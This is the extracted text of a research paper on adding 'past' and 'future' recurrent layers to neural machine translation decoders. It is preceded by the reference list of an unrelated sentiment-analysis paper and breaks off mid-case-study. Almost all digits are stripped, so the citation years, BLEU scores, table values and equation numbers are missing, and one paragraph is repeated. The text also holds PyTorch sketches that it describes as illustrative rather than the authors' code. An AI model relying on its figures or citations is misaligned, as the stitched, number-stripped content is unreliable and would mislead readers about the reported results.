bidirectional dependency tree representation. available at http://arxiv.org/abs/ . . maria p, dimitrios g, haris p, suresh m. . semeval- task : aspect based sentiment analysis. in: proceedings ofthe th international workshop on semantic evaluation (semeval ). denver, – . mcauley j, leskovec j. . hidden factors and hidden topics: understanding rating dimensions with review text. 
in: proceedings of the th acm conference on recommender systems. new york, – . mikolov t, yih w, zweig g. . linguistic regularities in continuous space word representations. in: proceedings of naacl-hlt . atlanta, – . pengfei l, shafiq j, helen m. . fine-grained opinion mining with recurrent neural networks and word embeddings. in: proceedings of the conference on empirical methods in natural language processing. lisbon, portugal, – . pontiki m, pavlopoulos j. . semeval- task : aspect based sentiment analysis. in: proceedings of the th international workshop on semantic evaluation. – doi . /ajcsit.v i . . popescu a, etzioni o. . extracting product features and opinion from reviews. in: proceedings of the conference on human language technology and empirical methods in natural language processing. british columbia: vancouver, – . poria s, cambria e, gelbukh a. . aspect extraction for opinion mining with a deep convolutional neural network. knowledge-based systems : – doi . /j.knosys. . . . qiu g, liu b, bu j, chen c. . opinion word expansion and target extraction through double propagation. computational linguistics ( ): – doi . /coli_a_ . toh z, su j. . nlangp at semeval- task : improving aspect based sentiment analysis using neural network features. in: proceedings of semeval- . vol. . san diego, – . toh z, wang w. . dlirec: aspect term extraction and term polarity classification system. in: proceedings of the th international workshop on semantic evaluation (semeval ). dublin, – . wang l, liu k, cao z, zhao j, de melo g. . sentiment-aspect extraction based on restricted boltzmann machines. in: proceedings of the rd annual meeting of the association for computational linguistics and the th international joint conference on natural language processing (volume : long papers). beijing, – . wang w, pan sj, dahlmeier d. . multi-task memory networks for category-specific aspect and opinion terms co-extraction. in: association for the advancement of artificial intelligence. – . available at http://arxiv.org/abs/ . . da’u and salim ( ), peerj comput. sci., doi . /peerj-cs. / http://arxiv.org/abs/ . http://dx.doi.org/ . /ajcsit.v i . http://dx.doi.org/ . /j.knosys. . . http://dx.doi.org/ . /coli_a_ http://arxiv.org/abs/ . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ wang w, pan sj, dahlmeier d, xiao x. . recursive neural conditional random fields for aspect-based sentiment analysis. in: proceedings of the conference on empirical methods in natural language processing (emnlp- ), – . available at http://arxiv.org/abs/ . . wang b, wang h. . bootstrapping both product features and opinion words from chinese customer reviews with cross-inducing. in: ijcnlp, – . available at http://scholar.google. com/scholar?hl=en&btng=search&q=intitle:bootstrapping+both+product+features+and +opinion+words+from+chi-+nese+customer+reviews+with+cross-inducing+ # . xu l, lin j, wang l, yin c, wang j. . deep convolutional neural network based approach for aspect-based sentiment analysis. advanced science and technology letters : – doi . /astl. . . . xu h, liu b, shu l, yu ps. a. double embeddings and cnn-based sequence labeling for aspect extraction. in: proceedings of the th annual meeting of the association for computational linguistics. – . available at http://arxiv.org/abs/ . . xu h, liu b, shu l, yu ps. b. double embeddings and cnn-based sequence labeling for aspect extraction. in: proceedings of the th annual meeting of the association for computational linguistics, melbourne, – . 
ye h, yan z, luo z. dependency-tree based convolutional neural networks for aspect term extraction. in: advances in knowledge discovery and data mining (pakdd). new york: springer.
yin y, wei f, dong l, xu k, zhang m, zhou m. unsupervised word and dependency path embeddings for aspect term extraction. in: ijcai international joint conference on artificial intelligence. new york: aaai press.
modeling past and future for neural machine translation
zaixiang zheng* (nanjing university, zhengzx@nlp.nju.edu.cn), hao zhou* (toutiao ai lab, zhouhao.nlp@bytedance.com), shujian huang (nanjing university, huangsj@nlp.nju.edu.cn), lili mou (university of waterloo, doublepower.mou@gmail.com), xinyu dai (nanjing university, dxy@nlp.nju.edu.cn), jiajun chen (nanjing university, chenjj@nlp.nju.edu.cn), zhaopeng tu (tencent ai lab, zptu@tencent.com)
* equal contributions. † our code can be downloaded from https://github.com/zhengzx-nlp/past-and-future-nmt.

abstract
existing neural machine translation systems do not explicitly model what has been translated and what has not during the decoding phase. to address this problem, we propose a novel mechanism that separates the source information into two parts: translated past contents and untranslated future contents, which are modeled by two additional recurrent layers. the past and future contents are fed to both the attention model and the decoder states, which provides neural machine translation (nmt) systems with the knowledge of translated and untranslated contents. experimental results show that the proposed approach significantly improves the performance in chinese-english, german-english, and english-german translation tasks. specifically, the proposed model outperforms the conventional coverage model in terms of both the translation quality and the alignment error rate.†

introduction
neural machine translation (nmt) generally adopts an encoder-decoder framework (kalchbrenner and blunsom, ; cho et al., ; sutskever et al., ), where the encoder summarizes the source sentence into a source context vector, and the decoder generates the target sentence word-by-word based on the given source. during translation, the decoder implicitly serves several functionalities at the same time:
1. building a language model over the target sentence for translation fluency (lm).
2. acquiring the most relevant source-side information to generate the current target word (present).
3. maintaining what parts in the source have been translated (past) and what parts have not (future).
however, it may be difficult for a single recurrent neural network (rnn) decoder to accomplish these functionalities simultaneously. a recent successful extension of nmt models is the attention mechanism (bahdanau et al., ; luong et al., ), which makes a soft selection over source words and yields an attentive vector to represent the most relevant source parts for the current decoding state. in this sense, the attention mechanism separates the present functionality from the decoder rnn, achieving significant performance improvement.
in addition to present, we address the importance of modeling past and future contents in machine translation. the past contents indicate translated information, whereas the future contents indicate untranslated information, both being crucial to nmt models, especially to avoid under-translation and over-translation (tu et al., ). ideally, past grows and future declines during the translation process. however, it may be difficult for a single rnn to explicitly model the above processes. in this paper, we propose a novel neural machine translation system that explicitly models past and future contents with two additional rnn layers. the rnn modeling the past contents (called past layer) starts from scratch and accumulates the information that is being translated at each decoding step (i.e., the present information yielded by attention). the rnn modeling the future contents (called future layer) begins with the holistic source summarization, and subtracts the present information at each step. the two processes are guided by proposed auxiliary objectives. intuitively, the rnn state of the past layer corresponds to source contents that have been translated at a particular step, and the rnn state of the future layer corresponds to source contents of untranslated words. at each decoding step, past and future together provide a full summarization of the source information. we then feed the past and future information to both the attention model and decoder states. in this way, our proposed mechanism not only provides coverage information for the attention model, but also gives a holistic view of the source information at each time step.

we conducted experiments on chinese-english, german-english, and english-german benchmarks. experiments show that the proposed mechanism yields . , . , and . improvements of bleu scores in the three tasks, respectively. in addition, it obtains an alignment error rate of . %, significantly lower than the baseline ( . %) and the coverage model ( . %) by tu et al. ( ). we observe that in traditional attention-based nmt, most errors occur due to over- and under-translation, which is probably because the decoder rnn fails to keep track of what has been translated and what has not. our model can alleviate such problems by explicitly modeling past and future contents.

motivation
in this section, we first introduce the standard attention-based nmt, and then motivate our model with several empirical findings. the attention mechanism, proposed in bahdanau et al. ( ), yields a dynamic source context vector for the translation at a particular decoding step, modeling present information as described above. this process is illustrated in figure .

(figure : architecture of attention-based nmt, showing the encoder annotations, the attention weights producing the source vector for present translation, and the decoder initialized with the source summarization.)

formally, let $\mathbf{x} = \{x_1, \ldots, x_I\}$ be a given input sentence. the encoder rnn, generally implemented as a bi-directional rnn (schuster and paliwal, ), transforms the sentence into a sequence of annotations, with $h_i = [\overrightarrow{h}_i; \overleftarrow{h}_i]$ being the annotation of $x_i$ ($\overrightarrow{h}_i$ and $\overleftarrow{h}_i$ refer to the rnn's hidden states in the two directions).
based on the source annotations, another decoder rnn generates the translation by predicting a target word $y_t$ at each time step $t$:

$p(y_t \mid y_{<t}, \mathbf{x}) = \mathrm{softmax}\big(g(y_{t-1}, s_t, c_t)\big)$ ( )

where $g(\cdot)$ is a non-linear activation, and $s_t$ is the decoding state for time step $t$, computed by

$s_t = f(y_{t-1}, s_{t-1}, c_t)$ ( )

here $f(\cdot)$ is an rnn activation function, e.g., the gated recurrent unit (gru) (cho et al., ) or long short-term memory (lstm) (hochreiter and schmidhuber, ). $c_t$ is a vector summarizing relevant source information, computed as a weighted sum of the source annotations:

$c_t = \sum_{i=1}^{I} \alpha_{t,i} \cdot h_i$ ( )

where the weights $\alpha_{t,i}$, for $i = 1, \ldots, I$, are given by the attention mechanism:

$\alpha_{t,i} = \mathrm{softmax}\big(a(s_{t-1}, h_i)\big)$ ( )

here, $a(\cdot)$ is a scoring function, measuring the degree to which the decoding state and the source information match each other.

table (a): translation example, with under-translated words highlighted and over-translated words italicized.
src: 与此同时,他呼吁提高民事服务效率, 这也是鼓舞民心之举。
ref: in the meanwhile he calls for better efficiency in civil service , which helps to promote people 's trust .
nmt: at the same time , he called for a higher efficiency in civil service efficiency .
table (b): source summarization is not fully exploited by the nmt decoder; initializing the decoder states with the source summarization and with an all-zero vector yields nearly the same bleu.
table : evidence that attention-based nmt fails to make full use of the source information, thus losing the holistic picture of the source contents.

intuitively, the attention-based decoder selects source annotations that are most relevant to the decoder state, based on which the current target word is predicted. in other words, $c_t$ is the source information for the present translation. the decoder rnn is initialized with the summarization of the entire source sentence, $[\overrightarrow{h}_I; \overleftarrow{h}_1]$, given by

$s_0 = \tanh\big(W_s [\overrightarrow{h}_I; \overleftarrow{h}_1]\big)$ ( )

after analyzing existing attention-based nmt in detail, our intuition arises as follows. ideally, with the source summarization in mind, after generating each target word $y_t$ from the source contents $c_t$, the decoder should keep track of translated source contents by accumulating $c_t$, and of untranslated source contents by subtracting $c_t$ from the source summarization. however, such information is not well learned in practice, as there is no explicit mechanism to maintain translated and untranslated contents. evidence shows that attention-based nmt still suffers from serious over- and under-translation problems (tu et al., ; tu et al., b). examples of under-translation are shown in table (a). another piece of evidence also shows that the decoder may lack a holistic view of the source information, as explained below. we conduct a pilot experiment by removing the initialization of the rnn decoder. if the "holistic" context were well exploited by the decoder, translation performance would significantly decrease without the initialization. as shown in table (b), however, translation performance only decreases slightly after we remove the initialization. this indicates that nmt decoders do not make full use of the source summarization, and that the initialization only helps the prediction at the beginning of the sentence. we attribute the vanishing of such signals to the overloaded use of decoder states (e.g., the lm, past, and future functionalities), and hence we propose to explicitly model the holistic source summarization by past and future contents at each decoding step.
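the attention computation reviewed above can be summarized in a few lines. the pytorch sketch below uses an additive (bahdanau-style) scoring function, which is an assumption about the concrete form of a(.) rather than the authors' exact implementation; dimensions and names are illustrative.

```python
import torch
import torch.nn as nn
import torch.nn.functional as F

class AdditiveAttention(nn.Module):
    """score each annotation h_i against the previous decoder state s_{t-1},
    then form the context c_t as the attention-weighted sum."""
    def __init__(self, dec_dim, enc_dim, attn_dim=256):
        super().__init__()
        self.w_s = nn.Linear(dec_dim, attn_dim, bias=False)
        self.w_h = nn.Linear(enc_dim, attn_dim, bias=False)
        self.v = nn.Linear(attn_dim, 1, bias=False)

    def forward(self, s_prev, annotations):
        # s_prev: (batch, dec_dim); annotations h_1..h_I: (batch, I, enc_dim)
        scores = self.v(torch.tanh(
            self.w_s(s_prev).unsqueeze(1) + self.w_h(annotations))).squeeze(-1)
        alpha = F.softmax(scores, dim=-1)                              # alpha_{t,i}
        c_t = torch.bmm(alpha.unsqueeze(1), annotations).squeeze(1)    # context c_t
        return c_t, alpha

# usage with random tensors standing in for one decoding step
attn = AdditiveAttention(dec_dim=512, enc_dim=1024)
c_t, alpha = attn(torch.zeros(2, 512), torch.randn(2, 7, 1024))
```

the past/future extension discussed later simply widens the scoring input so that the previous past and future states are concatenated with s_{t-1} before scoring.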
related work our research is built upon an attention-based sequence-to-sequence model (bahdanau et al., ), but is also related to coverage modeling, fu- ture modeling, and functionality separation. we dis- cuss these topics in the following. coverage modeling. tu et al. ( ) and mi et al. ( ) maintain a coverage vector to indicate which source words have been translated and which source words have not. these vectors are updated by ac- cumulating attention probabilities at each decoding step, which provides an opportunity for the attention model to distinguish translated source words from untranslated ones. viewing coverage vectors as a (soft) indicator of translated source contents, follow- ing this idea, we take one step further. we model translated and untranslated source contents by di- rectly manipulating the attention vector (i.e., the source contents that are being translated) instead of attention probability (i.e., the probability of a source word being translated). in addition, we explicitly model both translated (with past-rnn) and untranslated (with future- rnn) instead of using a single coverage vector to indicate translated source words. the difference with tu et al. ( ) is that the past and future contents in our model are fed not only to the attention mechanism but also the decoder’s states. in the context of semantic-level coverage, wang et al. ( ) propose a memory-enhanced decoder sts past layer s ctc st p attention (present) layer decoder layer future layersts fs f f s p source summarization st- p figure : nmt decoder augmented with past and future layers. and meng et al. ( ) propose a memory-enhanced attention model. both implement the memory with a neural turing machine (graves et al., ), in which the reading and writing operations are ex- pected to erase translated contents and highlight un- translated contents. however, their models lack an explicit objective to guide such intuition, which is one of the key ingredients for the success in this work. in addition, we use two separate layers to ex- plicitly model translated and untranslated contents, which is another distinguishing feature of the pro- posed approach. future modeling. standard neural sequence de- coders generate target sentences from left to right, thus failing to estimate some desired properties in the future (e.g., the length of target sentence). to address this problem, actor-critic algorithms are em- ployed to predict future properties (li et al., ; bahdanau et al., ), in their models, an interpola- tion of the actor (the standard generation policy) and the critic (a value function that estimates the future values) is used for decision making. concerning the future generation at each decoding step, weng et al. ( ) guide the decoder’s hidden states to not only generate the current target word, but also predict the target words that remain untranslated. along the di- rection of future modeling, we introduce a future layer to maintain the untranslated source contents, which is updated at each decoding step by subtract- ing the source content being translated (i.e., atten- tion vector) from the last state (i.e., the untranslated source content so far). functionality separation. recent work has re- vealed that the overloaded use of representations makes model training difficult, and such problems can be alleviated by explicitly separating these func- tions (reed and freitas, ; ba et al., ; miller et al., ; gulcehre et al., ; rocktäschel et al., ). for example, miller et al. 
( ) sep- arate the functionality of look-up keys and mem- ory contents in memory networks (sukhbaatar et al., ). rocktäschel et al. ( ) propose a key- value-predict attention model, which outputs three vectors at each step: the first is used to predict the next-word distribution; the second serves as the key for decoding; and the third is used for the attention mechanism. in this work, we further separate past and future functionalities from the decoder’s hid- den representations. modeling past and future for neural machine translation in this section, we describe how to separate past and future functions from decoding states. we introduce two additional rnn layers (figure ): • future layer (section . ) encodes source contents to be translated. • past layer (section . ) encodes translated source contents. let us take y = {y ,y ,y ,y } as an example of the target sentence. the initial state of the future layer is a summarization of the whole source sen- tence, indicating that all source contents need to be translated. the initial state of the past layer is an all-zero vector, indicating no source content is yet neural network layer ✕ element-wise multiplication + element-wise addition st- st rt ✕ + ut ! - ✕ ! tanh ✕ st~ ct f f f (a) gru projected minus — neural network layer ✕ element-wise multiplication + element-wise addition st- st rt ✕ ct + ut ! - ✕ ! tanh ✕ st~ — tanh f f f (b) gru-o projected minus — neural network layer ✕ element-wise multiplication + element-wise addition st- st rt ct + ut ! - ✕ ! tanh ✕ st~ —✕ f f f (c) gru-i figure : variants of activation functions for the future layer. translated. after c is obtained by the attention mechanism, we ( ) update the future layer by “subtracting” c from the previous state, and ( ) update the past layer state by “adding” c to the previous state. the two rnn states are updated as described above at every step of generating y , y , y , and y . in this way, at each time step, the future layer encodes source contents to be translated in the future steps, while the past layer encodes translated source con- tents up to the current step. the advantages of the past and the future lay- ers are two-fold. first, they provide coverage in- formation, which is fed to the attention model and guides nmt systems to pay more attention to un- translated source contents. second, they provide a holistic view of the source information, since we would anticipate “past + future = holistic.” we describe them in detail in the rest of this section. . modeling future formally, the future layer is a recurrent neural network (the first gray layer in figure ) , and its state at time step t is computed by sft = f(s f t− , ct), ( ) where f is the activation function for the future layer. we have several variants of f, aiming to bet- ter model the expected subtraction, as described in section . . . the future rnn is initialized with the summarization of the whole source sentence, as computed by equation . when calculating attention context at time step t, we feed the attention model with the future state from the last time step, which encodes source con- tents to be translated. we rewrite equation as αt,i = softmax ( a(st− , hi, s f t− ) ) . ( ) after obtaining attention context ct, we update future states via equation , and feed both of them to decoder states: st = f(st− ,yt− , ct, s f t ), ( ) where ct encodes the source context of the present translation, and sft encodes the source context on the future translation. . . 
activation functions for subtraction
we design several variants of rnn activation functions to better model the subtractive operation (figure ).

gru. a natural choice is the standard gru, which learns subtraction directly from the data:

$s^F_t = \mathrm{GRU}(s^F_{t-1}, c_t) = u_t \cdot s^F_{t-1} + (1 - u_t) \cdot \tilde{s}^F_t$ ( )
$\tilde{s}^F_t = \tanh\big(U(r_t \cdot s^F_{t-1}) + W c_t\big)$ ( )
$r_t = \sigma(U_r s^F_{t-1} + W_r c_t)$ ( )
$u_t = \sigma(U_u s^F_{t-1} + W_u c_t)$ ( )

where $r_t$ is a reset gate determining the combination of the input with the previous state, and $u_t$ is an update gate defining how much of the previous state to keep around. (our work focuses on gru, but the approach can be applied to other rnn architectures such as lstm.) the standard gru uses a feed-forward neural network to model the subtraction without any explicit operation, which may make training difficult. in the following two variants, we provide gru with explicit subtraction operations, inspired by the well-known phenomenon that the minus operation can be applied to the semantics of word embeddings (mikolov et al., ), e.g., e("king") − e("man") = e("queen") − e("woman"), where e(·) is the embedding of a word. therefore, we subtract the semantics being translated from the untranslated future contents at each decoding step.

gru with outside minus (gru-o). instead of directly feeding $c_t$ to the gru, we compute the current untranslated contents $M(s^F_{t-1}, c_t)$ with an explicit minus operation, and then feed it to the gru:

$s^F_t = \mathrm{GRU}\big(s^F_{t-1}, M(s^F_{t-1}, c_t)\big)$ ( )
$M(s^F_{t-1}, c_t) = \tanh(U_m s^F_{t-1} - W_m c_t)$ ( )

gru with inside minus (gru-i). we can alternatively integrate a minus operation into the calculation of $\tilde{s}^F_t$:

$\tilde{s}^F_t = \tanh\big(U s^F_{t-1} - W(r_t \cdot c_t)\big)$ ( )

compared with the standard gru, the differences of gru-i are: (1) the minus operation is applied to produce the energy of the intermediate candidate state $\tilde{s}^F_t$; and (2) the reset gate $r_t$ is used to control the amount of information flowing from the input instead of from the previous state $s^F_{t-1}$. note that for both gru-o and gru-i, we leave enough freedom for the gru to decide the extent to which the subtraction operations are integrated; in other words, the information subtraction is "soft".

modeling past
formally, the past layer is another recurrent neural network (the second gray layer in figure ), and its state at time step t is calculated by

$s^P_t = \mathrm{GRU}(s^P_{t-1}, c_t)$ ( )

initially, the past state is an all-zero vector, which denotes that no source content is yet translated. we choose gru as the activation function for the past layer, since the internal structure of gru is in accord with the "addition" operation. we feed the past state from the last time step to both the attention model and the decoder state:

$\alpha_{t,i} = \mathrm{softmax}\big(a(s_{t-1}, h_i, s^P_{t-1})\big)$ ( )
$s_t = f(s_{t-1}, y_{t-1}, c_t, s^P_{t-1})$ ( )

modeling past and future
we integrate the past and future layers together in our final model (figure ):

$\alpha_{t,i} = \mathrm{softmax}\big(a(s_{t-1}, h_i, s^F_{t-1}, s^P_{t-1})\big)$ ( )
$s_t = f(s_{t-1}, y_{t-1}, c_t, s^F_{t-1}, s^P_{t-1})$ ( )

in this way, both the attention model and the decoder state are aware of what has, and what has not yet been translated.

learning
we introduce additional loss functions to estimate the semantic subtraction and addition, which guide the training of the future layer and the past layer, respectively.

loss function for subtraction. as described above, the future layer models the future semantics in a declining way: $\Delta^F_t = s^F_{t-1} - s^F_t \approx c_t$.
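the inside-minus update described above can be written compactly. the pytorch cell below is a minimal sketch of the gru-i future-layer update under stated assumptions: the 512-dimensional default, bias-free projections and weight names are illustrative, not the authors' released implementation.

```python
import torch
import torch.nn as nn

class GRUIMinusCell(nn.Module):
    """one step of the gru-i ('inside minus') future-layer update."""
    def __init__(self, dim=512):
        super().__init__()
        self.U_r = nn.Linear(dim, dim, bias=False)
        self.W_r = nn.Linear(dim, dim, bias=False)
        self.U_u = nn.Linear(dim, dim, bias=False)
        self.W_u = nn.Linear(dim, dim, bias=False)
        self.U = nn.Linear(dim, dim, bias=False)
        self.W = nn.Linear(dim, dim, bias=False)

    def forward(self, s_prev, c_t):
        # s_prev: previous future state s^F_{t-1}; c_t: attention context
        r_t = torch.sigmoid(self.U_r(s_prev) + self.W_r(c_t))   # reset gate
        u_t = torch.sigmoid(self.U_u(s_prev) + self.W_u(c_t))   # update gate
        # inside minus: the candidate state subtracts the gated present content
        s_tilde = torch.tanh(self.U(s_prev) - self.W(r_t * c_t))
        return u_t * s_prev + (1.0 - u_t) * s_tilde

# usage for one decoding step on a batch of two sentences
cell = GRUIMinusCell()
s_next = cell(torch.randn(2, 512), torch.randn(2, 512))
```

the gru-o variant would instead compute an explicit difference tanh(U_m s_prev - W_m c_t) and feed it as the input to an otherwise standard gru cell.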
since the source and target sides contain equivalent semantic information in machine translation (tu et al., a), i.e., $c_t \approx e(y_t)$, we directly measure the consistency between $\Delta^F_t$ and $e(y_t)$, which guides the subtraction to learn the right thing:

$\mathrm{loss}(\Delta^F_t, e(y_t)) = -\log \frac{\exp\big(l(\Delta^F_t, e(y_t))\big)}{\sum_{y} \exp\big(l(\Delta^F_t, e(y))\big)}; \qquad l(u, v) = u^\top W v + b$

in other words, we explicitly guide the future layer by this subtractive loss, expecting $\Delta^F_t$ to be discriminative of the current word $y_t$.

loss function for addition. likewise, we introduce another loss function to measure the information increment of the past layer. notice that $\Delta^P_t = s^P_t - s^P_{t-1} \approx c_t$ is defined similarly to $\Delta^F_t$ except for a minus sign. in this way, we can reasonably assume the future and past layers are indeed doing subtraction and addition, respectively.

training objective. we train the proposed model $\hat{\theta}$ on a set of training examples $\{[\mathbf{x}^n, \mathbf{y}^n]\}_{n=1}^{N}$, and the training objective is

$\hat{\theta} = \arg\min_{\theta} \sum_{n=1}^{N} \sum_{t=1}^{|\mathbf{y}|} \Big\{ \underbrace{-\log p(y_t \mid y_{<t}, \mathbf{x}; \theta)}_{\text{neg. log-likelihood}} + \underbrace{\mathrm{loss}(\Delta^F_t, e(y_t) \mid \theta)}_{\text{future loss}} + \underbrace{\mathrm{loss}(\Delta^P_t, e(y_t) \mid \theta)}_{\text{past loss}} \Big\}$

experiments
dataset. we conduct experiments on chinese-english (zh-en), german-english (de-en), and english-german (en-de) translation tasks. for zh-en, the training set consists of . m sentence pairs, which are extracted from the ldc corpora (including ldc e , ldc e , ldc e , and the hansards portion of ldc t , ldc t and ldc t ). the nist (mt ) dataset is our development set; the nist (mt ), (mt ), (mt ), (mt ) datasets are test sets. we also evaluate the alignment performance on the standard benchmark of liu and sun ( ), which contains manually aligned sentence pairs. we measure the alignment quality with the alignment error rate (och and ney, ). for de-en and en-de, we conduct experiments on the wmt (bojar et al., ) corpus. the dataset consists of . m sentence pairs. we use newstest as our development set, and newstest as our test set. we follow sennrich et al. ( a) to segment both german and english words into subwords using byte-pair encoding (sennrich et al., , bpe). we measure the translation quality with bleu scores (papineni et al., ). we use the multi-bleu script (https://github.com/moses-smt/mosesdecoder/blob/master/scripts/generic/multi-bleu.perl) for zh-en, and the multi-bleu-detok script (https://github.com/edinburghnlp/nematus/blob/master/data/multi-bleu-detok.perl) for de-en and en-de.

training details. we use nematus (sennrich et al., b), implementing a baseline translation system, rnnsearch. for zh-en, we limit the vocabulary size to k. for de-en and en-de, the number of joint bpe operations is , , and we use the full bpe vocabulary for each side. we tie the weights of the target-side embeddings and the output weight matrix (press and wolf, ) for de-en. all out-of-vocabulary words are mapped to a special token unk. we train each model on sentences of up to words in the training data. the dimension of the word embeddings is , and all hidden sizes are . in training, we set the batch size to for zh-en, and for de-en and en-de. we set the beam size to in testing. we shuffle the training corpus after each epoch. we use adam (kingma and ba, ) with annealing (denkowski and neubig, ) as our optimization algorithm. we set the initial learning rate to . , which halves when the validation cross-entropy does not decrease. for the proposed model, we use the same settings as the baseline model, and the future and past layer sizes are . we employ a two-pass strategy for training the proposed model, which has proven useful to ease training difficulty when the model is relatively complicated (shen et al., ; wang et al., ; wang et al., ): model parameters shared with the baseline are initialized from the baseline model.

results on chinese-english
we first evaluate the proposed model on the chinese-english translation and alignment tasks.

translation quality
table shows the translation performances on chinese-english.
we employ a two-pass strategy for training the proposed model, which has proven useful to ease training difficulty when the model is relatively complicated (shen et al., ; wang et al., ; wang et al., ). model parameters shared with the baseline are initialized by the base- line model. . results on chinese-english we first evaluate the proposed model on the chinese-english translation and alignment tasks. . . translation quality table shows the translation performances on chinese-english. clearly the proposed approach significantly improves the translation quality in all cases, although there are still considerable differ- ences among different variants. future layer. (rows - ). all the activation functions for the future layer obtain bleu score improvements: gru + . , gru-o + . , and gru-i + . . specifically, gru-o is better than https://github.com/edinburghnlp/nematus # model dev mt mt mt mt avg. ∆ rnnsearch . . . . . . - + frnn (gru) . , . . . . + . + frnn (gru-o) . . . . . . + . + frnn (gru-i) . . . . . . + . + frnn (gru-i) + loss . . . . . . + . + prnn . . . . . . + . + prnn + loss . . . . . . + . + frnn (gru-i) + prnn . . . . . . + . + frnn (gru-i) + prnn + loss . . . . . . + . rnnsearch- dec . . . . . . - . rnnsearch- dec . . . . . . + . coverage (tu et al., ) . . . . . . + . table : case-insensitive bleu on chinese-english translation. “loss” means applying loss functions for future layer (frnn) and past layer (prnn). a regular gru for its minus operation, and gru- i is the best, which shows that our elaborately de- signed architecture is more proper for modeling the decreasing phenomenon of the future semantics. adding subtractive loss gives an extra . bleu score improvement, which indicates that adding g is beneficial guided objective for frnn to learn the minus operation. past layer. (rows - ). we observe the same trend on introducing the past layer: using it alone achieves a significant improvement (+ . ), and with the additional objective, it further improves the translation performance (+ . ). stacking the future and the past together. (rows - ). the model’s final architecture outper- forms our intermediate models ( - ) by combin- ing frnn and prnn. by further separating the functionaries of past content modeling and language modeling into different neural components, the final model is more flexible, obtaining a . bleu im- provement over the best intermediate model (row ) and an improvement of . bleu points over the rnnsearch baseline. comparison with other work. (rows - ). we also conduct experiments with multi-layer de- coders (wu et al., ) to see whether the nmt system can automatically model the translated and untranslated contents with additional decoder lay- ers (rows - ). however, we find that the per- formance is not improved using a two-layer decoder (row ), until a deeper version (three-layer decoder, row ) is used. this indicates that enhancing per- formance by simply adding more rnn layers into the decoder without any explicit instruction is non- trivial, which is consistent with the observation of britz et al. ( ). our model also outperforms the word-level cov- erage (tu et al., ), which considers the cover- age information of the source words independently. our proposed model can be regarded as a high-level coverage model, which captures higher level cover- age information, and gives more specific signals for the decision of attention and target prediction. 
our model is more deeply involved in generating target words, by being fed not only to the attention model as in tu et al. ( ), but also to the decoder state. . . subjective evaluation following tu et al. ( ), we conduct subjective evaluations to validate the benefit of modeling the past and the future (table ). four human eval- uators are asked to evaluate the translations of source sentences, which are randomly sampled from the testsets without knowing from which system the translation is selected. for the base system, . % of the source words are over-translated and . % are under-translated. our proposed model alleviates these problems by explicitly modeling the dynamic system architecture de-en en-de dev test dev test rikters et al. ( ) cgru + bpe + dropout . . . . + name entity forcing + synthetic data . . . . escolano et al. ( ) char char + rescoring with inverse model . - . - + synthetic data - . - . sennrich et al. ( a) cgru + bpe + synthetic data . . . . this work base . . . . coverage . . . . ours . . . . table : results of de-en and en-de “synthetic data” denotes additional m monolingual sentences, which is not used in our work. model over-trans under-trans ratio ∆ ratio ∆ base . % – . % – coverage . % - . % . % - . % ours . % - . % . % - . % table : subjective evaluation on over- and under- translation for chinese-english. “ratio” denotes the percentage of source words which are over- or under-translated, “∆” indicates relative improve- ment. “base” denotes rnnsearch and “ours” denotes “+ frnn (gru-i) + prnn + loss”. source contents by the past and the future lay- ers, reducing . % and . % of over-translation and under-translation errors, respectively. the pro- posed model is especially effective for alleviating the under-translation problem, which is a more se- rious translation problem for nmt systems, and is mainly caused by lacking necessary coverage infor- mation (tu et al., ). . . alignment quality table lists the alignment performances of our proposed model. we find that the coverage model does improve attention model. but our model can produce much better alignments compared to the word level coverage (tu et al., ). our model distinguishes the past and future directly, which is a higher level coverage mechanism than the word coverage model. model aer ∆ base . – coverage . - . ours . - . table : evaluation of the alignment quality. the lower the score, the better the alignment quality. . results on german-english we also evaluate our model on the wmt bench- marks for both de-en and en-de. as shown in table , our baseline gives comparable bleu scores to the state-of-the-art nmt systems of wmt . our pro- posed model improves the strong baseline on both de-en and en-de. this shows that our proposed model works well across different language pairs. rikters et al. ( ) and sennrich et al. ( a) ob- tain higher bleu scores than our model, because they use additional large scale synthetic data (about m) for training. it maybe unfair to compare our model to theirs directly. . analysis we conduct analyses on zh-en, to better understand our model from different perspectives. parameters and speeds. as shown in table , the baseline model (base) has m parameters. a single future or past layer introduces m to m parameters, and the corresponding objective introduces m parameters. in this work, the most complex model introduces m parameters, which model #para. speed train test base m . . + frnn (gru) m . . + frnn (gru-o) m . . + frnn (gru-i) m . . + loss m . . + prnn m . . + loss m . . 
+ frnn + prnn m . . + loss m . . rnnsearch- dec m . . rnnsearch- dec m . . coverage m . . table : statistics of parameters, training and testing speeds (sentences per second). leads to a relatively slower training speed. how- ever, our proposed model does not significant slow down the decoding speed. the most time consum- ing part is the calculation of the subtraction and ad- dition losses. as we show in the next paragraph, our system works well by only using the losses in training, which further improve the decoding speed of our model. effectiveness of subtraction and addition loss. adding subtraction and addition loss functions helps twofold: ( ) guiding the training of the proposed subtraction and addition operation; ( ) enabling bet- ter reranking of generated candidates in testing. ta- ble lists the improvements from the two perspec- tives. when applied only in training, the two loss functions lead to an improvement of . bleu points by better modeling subtraction and addition operations. on top of that, reranking with future and past loss scores in testing further improves the performance by + . bleu points. initialization of the future layer. the base- line model does not obtain abundant accuracy im- provement by feeding the source summarization into the decoder (table ). we also experiment to not feed the source summarization into the decoder of the proposed model, which leads to a significant bleu score drop on zh-en. this shows that our proposed model better use the source summarization model loss used in bleu ∆ train test base – – . – ours × × . + . x × . + . x x . + . table : contributions of loss functions from param- eter training (“train”) and reranking of candidates in testing (“test”). initialize frnn with . . . bleu source summarization . all-zero vector . table : influence of initialization of frnn layer (gru-i) with explicitly modeling the future compared to the conventional encoder-decoder baseline. case study. we also compare the translation cases for the baseline, word level coverage and our proposed models. as shown in table , our base- line system suffers from the over-translation prob- lems (case ), which is consistent with the results of human evaluation (section ). the base system also incorrectly translates “the royal family” into “the people of hong kong”, which is totally irrele- vant here. we attribute the former case to the lack of untranslated future modeling, and the latter one to the overloaded use of the decoder state where the language modeling of the decoder leads to the flu- ent but wrong predictions. in contrast, the proposed approach almost addresses the errors in these cases. conclusion modeling source contents well is crucial for encoder-decoder based nmt systems. however, current nmt models suffer from distinguishing translated and untranslated translation contents, due to the lack of explicitly modeling past and future translations. in this paper, we separate past and future functionalities from decoder states, which can maintain a dynamic yet holistic view of the source content at each decoding step. experimen- tal results show that the proposed approach signifi- source 布什还表示 , 应巴基斯坦和印度政府的邀请 , 他将于 月份对巴基斯坦和 印度进行访问。 reference bush also said that at the invitation of the pakistani and indian governments , he would visit pakistan and india in march . base bush also said that he would visit pakistan and india in march . coverage 